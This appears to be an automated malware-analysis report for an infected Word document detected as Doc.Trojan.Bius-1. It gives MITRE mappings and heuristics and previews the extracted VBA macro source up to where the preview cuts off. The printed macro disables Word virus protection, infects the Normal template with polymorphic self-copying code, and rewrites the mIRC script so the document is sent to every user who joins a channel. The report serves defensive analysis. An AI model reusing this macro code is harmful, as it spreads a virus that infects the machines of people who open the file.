MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1037.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
The sample contains VBA macros with AutoOpen and Document_Open subroutines, indicating it is designed to execute malicious code upon opening. The script attempts to save a file named 'Eugene.doc' and create an mIRC script to automatically send this file to chat room members upon joining. It also attempts to disable virus protection and save the document, suggesting an attempt to evade detection and spread.
Heuristics 6
-
ClamAV: Doc.Trojan.Bius-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Bius-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 161087 bytes |
SHA-256: f0982c63a1a615ce7b07675cf563652c7c5651ccec7a8d55ed2b23bf7034b4e9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
End
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Sub DOCUMENT_CLOSE()
On Error Resume Next
Arsonists:
Randomize Timer
Options.VirusProtection = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
GI = 8: GJ = 10: GR = 2: NX = 21: GL = 2: LO = 5
X9 = Chr(34): C = Chr(13): CC = Chr(34)
O2 = Normal.ThisDocument.Variables(1).Value
O3 = ActiveDocument.Variables(1).Value
If Len(O2) > 8000 Or O4 > 18 Then
O5 = 1
Do While Not Mid(O2, Len(O2) - O4, 1) = "'"
O4 = O4 + 1
O7 = Right(O2, O4)
Loop
End If
MsgBox "There are many ways to be a winner. This is one of them." & Chr(13) & "For any comments, suggestions or questions contact:" & Chr(13) & "" & Chr(13) & "eugene@avp.ru", 0, "Arsonists (c) 1998 Eugene Kaspersky"
ActiveDocument.SaveAs FileName:="C:\Eugene.doc", fileformat:=wdFormatDocument, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Kill "C:\mIRC\Script.ini"
Open "C:\mIRC\Script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick C:\Eugene.doc }"
Print #1, "n1=on 1:CONNECT: {"
Close 1
End Sub
L = Int(1 * 2)
If Len(O3) > 8000 Or O8 > 18 Then
O6 = 1
Do While Not Mid(O3, Len(O3) - O8, 1) = "'"
O8 = O8 + 1
O9 = Right(O3, O8)
Loop
End If
Set N1 = ActiveDocument.VBProject.VBCOMPONENTS(1).CODEMODULE
Set N2 = NormalTemplate.VBProject.VBCOMPONENTS(1).CODEMODULE
NI = N2.LINES(103, 1)
AI = N1.LINES(103, 1)
If Right(NI, 8) = "Vorg:" Then N3 = 1
If Right(AI, 8) = "Vorg:" Then N4 = 1
If N3 = 0 Then
Set N5 = N2
Set N6 = N1
Else
Set N5 = N1
Set N6 = N2
End If
If O5 = 1 Then V0 = O7: NE = O2: GoTo 9
For w = 1 To 100
N8 = N8 + C
Next w
With N6
For X = 1 To .COUNTOFLINES - 1
N7 = .LINES(X, 1)
If Left(N7, 1) = "'" Then GoTo 0
N8 = N8 & N7 & C
N9 = Int(5 * Rnd + 1)
If N9 = GR And X > 3 Then GoSub NA: U2 = "'" & NB & C: N8 = N8 & U2: U4 = U4 + Len(U2)
0 Next X
N8 = UCase(N8) & "END SUB" & C & "'"
RZ = Len(N8) - U4
End With
GoSub O1: V0 = NB
Do While Not Len(N8) = Len(NE)
q = q + 1
H = H + 1
NF = Mid(N8, q, 1)
H1 = Mid(V0, H, 1)
NG = Chr(Asc(NF) + Asc(H1))
If H = Len(V0) Then H = 0
NE = NE + NG
Loop
NE = NE + "'" + V0
9 LO = 5
GoSub NA: J1 = NB: GoSub NA: J2 = NB: GoSub NA: J3 = NB
GoSub NA: J4 = NB: GoSub NA: J5 = NB: GoSub NA: J6 = NB
GoSub NA: J9 = NB: GoSub NA: JA = NB: GoSub NA: JB = NB
GoSub NA: JC = NB: GoSub NA: JD = NB: GoSub NA: JE = NB
GoSub NA: JF = NB: GoSub NA: JG = NB: GoSub NA: JH = NB
GoSub NA: JI = NB: GoSub NA: JJ = NB: GoSub NA: JK = NB
GoSub NA: JL = NB: GoSub NA: VX = M: GoSub NA: JM = NB
GoSub NA: V1 = NB: GoSub NA: V2 = NB: GoSub NA: V3 = NB
GoSub NA: V4 = NB: GoSub NA: V5 = NB: GoSub NA: V6 = NB
GoSub NA: V7 = NB: GoSub NA: V8 = NB: GoSub NA: V9 = NB
GoSub NA: VA = NB: GoSub NA: VB = NB: GoSub NA: VC = NB
GoSub NA: NK = NB: GoSub NA: JZ = NB: GoSub NA: JV = NB
GoSub NA: TA = NB: GoSub NA: TB = NB: GoSub NA: TC = NB
GoSub NA: TD = NB: GoSub NA: TX = NB: GoSub NA: T4 = NB
GoSub NA: T5 = NB: GoSub NA: T6 = NB: GoSub NA: T7 = NB
GoSub NA: T8 = NB: WL = 10915: GoSub NA: T9 = NB
GoSub NA: JW = NB: NN = NC: GoSub NA: JX = NB: NN = 1
GoSub F1: R0 = F2: GoSub F1: RA = F2: GoSub F1: RB = F2
GoSub F1: RC = F2: GoSub F1: RD = F2: GoSub F1: RE = F2
GoSub F1: RF = F2: GoSub F1: RG = F2: GoSub F1: RH = F2
GoSub F1: RI = F2: NN = 0: GoSub F1: RJ = F2
For m1 = 1 To Len(VX): WW = WW + Asc(Mid(VX, m1, 1)): Next m1
GoTo NW
NA:
NB = Chr(Int(26 * Rnd + 65))
NL = Int((15 - LO) * Rnd + LO)
Do While Not Len(NB) = NL
6 NM = Int((122 - 48 + 1) * Rnd + 48)
If NM > 57 And NM < 65 Then GoTo 6
If NM > 90 And NM < 97 Then GoTo 6
NB = NB + Chr$(NM)
Loop
Return
O1:
NB = Chr(Int(26 * Rnd +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.